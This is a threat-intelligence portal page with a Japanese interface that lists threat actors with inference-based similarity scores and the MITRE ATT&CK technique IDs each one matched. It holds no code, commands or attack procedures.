  • T1177 - LSASS Driver
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1059.008 - Network Device CLI
  • T1497.002 - User Activity Based Checks
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

BackdoorDiplomacy

Score: 13.11
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

HAFNIUM

Score: 26.21
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1027.016 - Junk Code Insertion
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
  • T1497.002 - User Activity Based Checks
  • T1134 - Access Token Manipulation
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
MITREへのリンク →

Poseidon Group

Score: 3.32
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1497.002 - User Activity Based Checks
MITREへのリンク →

APT1

Score: 10.05
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1668 - Exclusive Control
MITREへのリンク →

Rocke

Score: 26.42
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1059.010 - AutoHotKey & AutoIT
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1612 - Build Image on Host
  • T1597 - Search Closed Sources
  • T1059.011 - Lua
  • T1059.013 - Container CLI/API
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1008 - Fallback Channels
MITREへのリンク →

INC Ransom

Score: 21.38
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Strider

Score: 11.19
Matched TTPs:
  • T1574.014 - AppDomainManager
  • T1130 - Install Root Certificate
  • T1569.002 - Service Execution
MITREへのリンク →

BlackByte

Score: 40.81
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1586.002 - Email Accounts
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1059.009 - Cloud API
  • T1555.003 - Credentials from Web Browsers
  • T1590.006 - Network Security Appliances
  • T1175 - Component Object Model and Distributed COM
  • T1606.001 - Web Cookies
  • T1134.001 - Token Impersonation/Theft
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Mustard Tempest

Score: 9.16
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1557.003 - DHCP Spoofing
  • T1059.012 - Hypervisor CLI
  • T1547.013 - XDG Autostart Entries
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Fox Kitten

Score: 32.57
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1612 - Build Image on Host
  • T1051 - Shared Webroot
  • T1497.002 - User Activity Based Checks
  • T1059.001 - PowerShell
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1656 - Impersonation
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1547.013 - XDG Autostart Entries
  • T1548.006 - TCC Manipulation
MITREへのリンク →

ToddyCat

Score: 9.98
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1497.002 - User Activity Based Checks
  • T1134 - Access Token Manipulation
  • T1547.008 - LSASS Driver
MITREへのリンク →

Blue Mockingbird

Score: 16.28
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1059.009 - Cloud API
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Volatile Cedar

Score: 8.14
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1002 - Data Compressed
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

DarkVishnya

Score: 8.53
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1209 - Time Providers
MITREへのリンク →

Carbanak

Score: 9.60
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
MITREへのリンク →

Akira

Score: 13.02
Matched TTPs:
  • T1586.002 - Email Accounts
  • T1552.003 - Shell History
  • T1497.002 - User Activity Based Checks
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1134 - Access Token Manipulation
MITREへのリンク →

LAPSUS$

Score: 33.16
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1175 - Component Object Model and Distributed COM
  • T1619 - Cloud Storage Object Discovery
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1137.004 - Outlook Home Page
  • T1564.003 - Hidden Window
  • T1548.006 - TCC Manipulation
MITREへのリンク →

Lotus Blossom

Score: 15.53
Matched TTPs:
  • T1059.009 - Cloud API
  • T1590.006 - Network Security Appliances
  • T1219.001 - IDE Tunneling
  • T1199 - Trusted Relationship
  • T1505 - Server Software Component
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
  • T1569.002 - Service Execution
MITREへのリンク →

Stealth Falcon

Score: 7.94
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1497.002 - User Activity Based Checks
  • T1556.009 - Conditional Access Policies
MITREへのリンク →

Leafminer

Score: 14.54
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1027.016 - Junk Code Insertion
  • T1219.001 - IDE Tunneling
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1134 - Access Token Manipulation
  • T1209 - Time Providers
MITREへのリンク →

Deep Panda

Score: 10.14
Matched TTPs:
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1497.002 - User Activity Based Checks
  • T1027.014 - Polymorphic Code
  • T1134 - Access Token Manipulation
MITREへのリンク →

FIN5

Score: 9.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1199 - Trusted Relationship
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1134 - Access Token Manipulation
MITREへのリンク →

CopyKittens

Score: 3.99
Matched TTPs:
  • T1045 - Software Packing
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
MITREへのリンク →

Windigo

Score: 8.15
Matched TTPs:
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
MITREへのリンク →

POLONIUM

Score: 9.02
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
  • T1547.002 - Authentication Package
MITREへのリンク →

Metador

Score: 4.08
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

APT18

Score: 3.50
Matched TTPs:
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
  • T1547.013 - XDG Autostart Entries
MITREへのリンク →

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

SilverTerrier

Score: 6.14
Matched TTPs:
  • T1552.003 - Shell History
  • T1041 - Exfiltration Over C2 Channel
MITREへのリンク →

APT17

Score: 5.45
Matched TTPs:
  • T1608.005 - Link Target
  • T1656 - Impersonation
MITREへのリンク →

TA578

Score: 3.37
Matched TTPs:
  • T1608.005 - Link Target
  • T1027.018 - Invisible Unicode
MITREへのリンク →

Thrip

Score: 4.58
Matched TTPs:
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1565.002 - Transmitted Data Manipulation
MITREへのリンク →

FIN10

Score: 3.07
Matched TTPs:
  • T1497.002 - User Activity Based Checks
  • T1199 - Trusted Relationship
  • T1157 - Dylib Hijacking
MITREへのリンク →

Suckfly

Score: 3.19
Matched TTPs:
  • T1157 - Dylib Hijacking
  • T1209 - Time Providers
MITREへのリンク →

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1027.014 - Polymorphic Code
  • T1051 - Shared Webroot
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1497.002 - User Activity Based Checks
  • T1608.005 - Link Target
  • T1037 - Boot or Logon Initialization Scripts
  • T1219.001 - IDE Tunneling
  • T1140 - Deobfuscate/Decode Files or Information
  • T1041 - Exfiltration Over C2 Channel
  • T1003.003 - NTDS
  • T1684 - Social Engineering
  • T1003.007 - Proc Filesystem
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
  • T1608 - Stage Capabilities
  • T1059.010 - AutoHotKey & AutoIT
  • T1566.002 - Spearphishing Link
  • T1668 - Exclusive Control
  • T1218.012 - Verclsid
  • T1059.009 - Cloud API
  • T1027.018 - Invisible Unicode
  • T1656 - Impersonation
  • T1205 - Traffic Signaling
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1547.013 - XDG Autostart Entries
  • T1059.011 - Lua
  • T1690 - Prevent Command History Logging
  • T1008 - Fallback Channels
  • T1027.010 - Command Obfuscation
  • T1087.002 - Domain Account
  • T1156 - Malicious Shell Modification
  • T1555.003 - Credentials from Web Browsers
  • T1565.002 - Transmitted Data Manipulation
  • T1055.014 - VDSO Hijacking
  • T1557.003 - DHCP Spoofing
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る